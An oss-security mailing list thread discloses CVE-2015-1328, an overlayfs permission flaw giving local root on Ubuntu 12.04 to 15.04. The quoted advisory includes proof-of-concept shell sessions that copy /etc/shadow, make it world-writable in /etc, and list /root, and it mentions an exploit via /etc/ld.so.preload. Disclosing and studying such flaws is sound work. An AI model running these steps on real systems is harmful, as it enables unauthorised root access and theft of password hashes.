Date: Tue, 16 Jun 2015 19:30:56 +0900 From: Philip Pettersson <philip.pettersson@...il.com> To: oss-security@...ts.openwall.com Subject: Re: CVE-2015-1328: incorrect permission checks in overlayfs, ubuntu local root No. By default unprivileged users can create new user and mount namespaces, which is why the scope is "in the default configuration on all currently supported versions of Ubuntu". On Tue, Jun 16, 2015 at 6:03 PM, Alban Crequy <alban.crequy@...il.com> wrote: > Hi, > > Do Ubuntu kernels still disable unprivileged CLONE_NEWUSER by default, > unless changed in /proc/sys/kernel/unprivileged_userns_clone? I see > the patch in Debian but I don't know if it is still in Ubuntu: > http://anonscm.debian.org/viewvc/kernel/dists/trunk/linux/debian/patches/debian/add-sysctl-to-disallow-unprivileged-CLONE_NEWUSER-by-default.patch?view=markup > > It should limit the scope of the issue to configurations where root > sets up user namespaces. > > Best regards, > Alban > > On 16 June 2015 at 02:17, Philip Pettersson <philip.pettersson@...il.com> wrote: >> Hello, this is CVE-2015-1328 which allows a local root privilege escalation >> in the default configuration on all currently supported versions of Ubuntu. >> >> The overlayfs filesystem does not correctly check file permissions when >> creating new files in the upper filesystem directory. This can be exploited >> by an unprivileged process in kernels with CONFIG_USER_NS=y and where >> overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs >> inside unprivileged mount namespaces. This is the default configuration of >> Ubuntu 12.04, 14.04, 14.10, and 15.04 . >> >> If you don't want to update your kernel and you don't use overlayfs, a viable >> workaround is to just remove or blacklist overlayfs.ko / overlay.ko. >> >> Details >> ================================ >> >> From Documentation/filesystems/overlayfs.txt : >> >> "Objects that are not directories (files, symlinks, device-special >> files etc.) are presented either from the upper or lower filesystem as >> appropriate. When a file in the lower filesystem is accessed in a way >> the requires write-access, such as opening for write access, changing >> some metadata etc., the file is first copied from the lower filesystem >> to the upper filesystem (copy_up)." >> >> The ovl_copy_up_* functions do not correctly check that the user has >> permission to write files to the upperdir directory. The only permissions >> that are checked is if the owner of the file that is being modified has >> permission to write to the upperdir. Furthermore, when a file is copied from >> the lowerdir the file metadata is carbon copied, instead of attributes such as >> owner being changed to the user that triggered the copy_up_* procedures. >> >> Example of creating a 1:1 copy of a root-owned file: >> >> (Note that the workdir= option is not needed on older kernels) >> >> user@...ntu-server-1504:~$ ./create-namespace >> root@...ntu-server-1504:~# mount -t overlay -o >> lowerdir=/etc,upperdir=upper,workdir=work overlayfs o >> root@...ntu-server-1504:~# chmod 777 work/work/ >> root@...ntu-server-1504:~# cd o >> root@...ntu-server-1504:~/o# mv shadow copy_of_shadow >> (exit the namespace) >> user@...ntu-server-1504:~$ ls -al upper/copy_of_shadow >> -rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow >> user@...ntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode >> Device: 801h/2049d Inode: 939791 Links: 1 >> Device: 801h/2049d Inode: 277668 Links: 1 >> >> Now we can place this file in /etc by switching "upper" to be the lowerdir >> option, the permission checks pass since the file is owned by root and root >> can write to /etc. >> >> user@...ntu-server-1504:~$ ./create-namespace >> root@...ntu-server-1504:~# mount -t overlay -o >> lowerdir=upper,upperdir=/etc,workdir=work overlayfs o >> root@...ntu-server-1504:~# chmod 777 work/work/ >> root@...ntu-server-1504:~# cd o >> root@...ntu-server-1504:~/o# chmod 777 copy_of_shadow >> root@...ntu-server-1504:~/o# exit >> user@...ntu-server-1504:~$ ls -al /etc/copy_of_shadow >> -rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow >> >> The attached exploit gives a root shell by creating a world-writable >> /etc/ld.so.preload file. The exploit has been tested on the most recent >> kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04. >> >> It is also possible to list directory contents for any directory on the system >> regardless of permissions: >> >> nobody@...ntu-server-1504:~$ ls -al /root >> ls: cannot open directory /root: Permission denied >> nobody@...ntu-server-1504:~$ mkdir o upper work >> nobody@...ntu-server-1504:~$ mount -t overlayfs -o >> lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work >> overlayfs /home/user/o >> nobody@...ntu-server-1504:~$ ls -al o 2>/dev/null >> total 8 >> drwxrwxr-x 1 root nogroup 4096 May 24 16:33 . >> drwxr-xr-x 8 root nogroup 4096 May 24 16:33 .. >> -????????? ? ? ? ? ? .bash_history >> -????????? ? ? ? ? ? .bashrc >> d????????? ? ? ? ? ? .cache >> -????????? ? ? ? ? ? .lesshst >> d????????? ? ? ? ? ? linux-3.19.0 >> >> >> Credit >> ================================ >> Philip Pettersson, Samsung SDS Security Center >> >> References >> ================================ >>  https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549 >>  https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt >>  http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.